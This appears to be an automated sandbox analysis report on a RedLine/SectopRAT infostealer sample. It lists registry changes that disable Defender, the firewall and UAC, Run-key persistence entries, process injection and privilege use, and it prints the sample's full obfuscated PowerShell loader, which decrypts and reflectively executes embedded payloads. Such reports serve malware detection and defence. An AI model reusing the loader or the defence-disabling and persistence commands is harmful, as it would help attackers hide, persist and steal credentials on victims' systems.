redline | d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	reg.exe

Modifies firewall policy service 3 TTPs 2 IoCs

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2264-152-0x0000000007C70000-0x0000000007C8E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/2264-152-0x0000000007C70000-0x0000000007C8E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
6100	bcdedit.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
1	2264	powershell.exe
18	2264	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4540	powershell.exe
4504	powershell.exe
2264	powershell.exe
4812	powershell.exe
5072	powershell.exe
1636	powershell.exe
4108	powershell.exe
4088	powershell.exe
2480	powershell.exe
4044	powershell.exe
1916	powershell.exe
4156	powershell.exe
3692	powershell.exe
6132	powershell.exe
4224	powershell.exe
2284	powershell.exe
2656	powershell.exe
4008	powershell.exe
2872	powershell.exe
2480	powershell.exe
4992	powershell.exe
1716	powershell.exe
4044	powershell.exe
2668	powershell.exe
2144	powershell.exe
3452	powershell.exe
1856	powershell.exe
2272	powershell.exe
1692	powershell.exe
720	powershell.exe
3708	powershell.exe
3952	powershell.exe
6128	powershell.exe
2044	powershell.exe
6120	powershell.exe
2744	powershell.exe
5584	powershell.exe
4740	powershell.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5772	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	B4B2DF0C17B9CC137372CFB2165D613B.exe

Executes dropped EXE 2 IoCs

pid	Process
3732	ujv1imdb.ufr.exe
1256	ujv1imdb.ufr.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 30 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "System3264Wow"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "taskhost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MSEdgeUpdateX = "MSEdgeUpdateX"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\taskhost = "taskhost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System3264Wow = "System3264Wow"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\keygroup777.ru = "native.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\root-cryptor = "root-cryptor.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\root-cryptor = "root-cryptor.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\crypt0rroot = "crypt0rroot.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windowsx-c = "windowsx-c.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\keygroup777.ru = "native.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS = "WINDOWS"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WindowsInstaller = "WindowsInstaller "	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "MSEdgeUpdateX"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "WINDOWS"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System = "System.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\_default64 = "_default64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "WindowsInstaller "	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crypt0rroot = "crypt0rroot.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AWindowsService = "AWindowsService.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive10293 = "OneDrive10293"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "System.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_default64 = "_default64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "OneDrive10293"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AWindowsService = "AWindowsService.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowsx-c = "windowsx-c.exe"	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

persistence privilege_escalation

Clear Persistence

T1070.009

pid	Process
3188	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3808	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe

Kills process with taskkill 9 IoCs

pid	Process
32	taskkill.exe
5968	taskkill.exe
3452	taskkill.exe
4204	taskkill.exe
720	taskkill.exe
5704	taskkill.exe
4852	taskkill.exe
1504	taskkill.exe
3256	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
1476	reg.exe
1588	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5436	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4504	powershell.exe
4504	powershell.exe
4088	powershell.exe
4812	powershell.exe
4088	powershell.exe
2264	powershell.exe
4812	powershell.exe
2264	powershell.exe
5072	powershell.exe
5072	powershell.exe
2480	powershell.exe
2480	powershell.exe
1636	powershell.exe
1636	powershell.exe
4044	powershell.exe
4044	powershell.exe
4108	powershell.exe
4108	powershell.exe
1916	powershell.exe
1916	powershell.exe
4156	powershell.exe
4156	powershell.exe
3692	powershell.exe
3692	powershell.exe
6132	powershell.exe
6132	powershell.exe
4540	powershell.exe
4540	powershell.exe
2264	powershell.exe
2264	powershell.exe
2972	B4B2DF0C17B9CC137372CFB2165D613B.exe
2972	B4B2DF0C17B9CC137372CFB2165D613B.exe
2744	powershell.exe
2744	powershell.exe
3952	powershell.exe
3952	powershell.exe
2668	powershell.exe
5584	powershell.exe
2668	powershell.exe
5584	powershell.exe
4740	powershell.exe
2144	powershell.exe
6128	powershell.exe
2144	powershell.exe
4740	powershell.exe
6128	powershell.exe
2872	powershell.exe
2872	powershell.exe
2480	powershell.exe
2480	powershell.exe
3452	powershell.exe
3452	powershell.exe
4224	powershell.exe
4224	powershell.exe
1856	powershell.exe
1856	powershell.exe
2284	powershell.exe
2284	powershell.exe
2656	powershell.exe
2656	powershell.exe
4992	powershell.exe
4992	powershell.exe
2272	powershell.exe
2272	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2972	B4B2DF0C17B9CC137372CFB2165D613B.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	6132	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	32	taskkill.exe
Token: SeDebugPrivilege	5968	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe
Token: SeDebugPrivilege	720	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	5704	taskkill.exe
Token: SeDebugPrivilege	3256	taskkill.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	5584	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	6128	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe
Token: SeIncBasePriorityPrivilege	1856	powershell.exe
Token: SeCreatePagefilePrivilege	1856	powershell.exe
Token: SeBackupPrivilege	1856	powershell.exe
Token: SeRestorePrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeSystemEnvironmentPrivilege	1856	powershell.exe
Token: SeRemoteShutdownPrivilege	1856	powershell.exe
Token: SeUndockPrivilege	1856	powershell.exe
Token: SeManageVolumePrivilege	1856	powershell.exe
Token: 33	1856	powershell.exe
Token: 34	1856	powershell.exe
Token: 35	1856	powershell.exe
Token: 36	1856	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	4852	taskkill.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 6084	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	85
PID 2972 wrote to memory of 6084	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	85
PID 2972 wrote to memory of 5936	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	87
PID 2972 wrote to memory of 5936	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	87
PID 2972 wrote to memory of 4504	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	88
PID 2972 wrote to memory of 4504	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	88
PID 6084 wrote to memory of 4492	6084	cmd.exe	92
PID 6084 wrote to memory of 4492	6084	cmd.exe	92
PID 6084 wrote to memory of 2264	6084	cmd.exe	93
PID 6084 wrote to memory of 2264	6084	cmd.exe	93
PID 6084 wrote to memory of 2264	6084	cmd.exe	93
PID 5936 wrote to memory of 2768	5936	cmd.exe	94
PID 5936 wrote to memory of 2768	5936	cmd.exe	94
PID 5936 wrote to memory of 4088	5936	cmd.exe	96
PID 5936 wrote to memory of 4088	5936	cmd.exe	96
PID 2972 wrote to memory of 4812	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	97
PID 2972 wrote to memory of 4812	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	97
PID 2972 wrote to memory of 5072	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	99
PID 2972 wrote to memory of 5072	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	99
PID 2972 wrote to memory of 2480	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	101
PID 2972 wrote to memory of 2480	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	101
PID 2972 wrote to memory of 1636	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	103
PID 2972 wrote to memory of 1636	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	103
PID 2972 wrote to memory of 4044	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	105
PID 2972 wrote to memory of 4044	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	105
PID 2972 wrote to memory of 4108	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	108
PID 2972 wrote to memory of 4108	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	108
PID 2972 wrote to memory of 1916	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	110
PID 2972 wrote to memory of 1916	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	110
PID 2972 wrote to memory of 4156	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	112
PID 2972 wrote to memory of 4156	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	112
PID 2972 wrote to memory of 3692	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	114
PID 2972 wrote to memory of 3692	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	114
PID 2972 wrote to memory of 6132	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	116
PID 2972 wrote to memory of 6132	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	116
PID 2972 wrote to memory of 4540	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	118
PID 2972 wrote to memory of 4540	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	118
PID 2972 wrote to memory of 5436	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	120
PID 2972 wrote to memory of 5436	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	120
PID 2972 wrote to memory of 1888	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	127
PID 2972 wrote to memory of 1888	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	127
PID 2972 wrote to memory of 3968	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	126
PID 2972 wrote to memory of 3968	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	126
PID 1888 wrote to memory of 32	1888	cmd.exe	130
PID 1888 wrote to memory of 32	1888	cmd.exe	130
PID 3968 wrote to memory of 5968	3968	cmd.exe	131
PID 3968 wrote to memory of 5968	3968	cmd.exe	131
PID 2972 wrote to memory of 4092	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	132
PID 2972 wrote to memory of 4092	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	132
PID 2972 wrote to memory of 5880	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	134
PID 2972 wrote to memory of 5880	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	134
PID 4092 wrote to memory of 3452	4092	cmd.exe	136
PID 4092 wrote to memory of 3452	4092	cmd.exe	136
PID 5880 wrote to memory of 4204	5880	cmd.exe	137
PID 5880 wrote to memory of 4204	5880	cmd.exe	137
PID 2972 wrote to memory of 1844	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	138
PID 2972 wrote to memory of 1844	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	138
PID 2972 wrote to memory of 1248	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	139
PID 2972 wrote to memory of 1248	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	139
PID 2972 wrote to memory of 720	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	140
PID 2972 wrote to memory of 720	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	140
PID 1844 wrote to memory of 1504	1844	cmd.exe	144
PID 1844 wrote to memory of 1504	1844	cmd.exe	144
PID 2972 wrote to memory of 3256	2972	B4B2DF0C17B9CC137372CFB2165D613B.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe
"C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\cqxwsvrp.vd1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\kqbmozv0.mkl.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\kqbmozv0.mkl.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
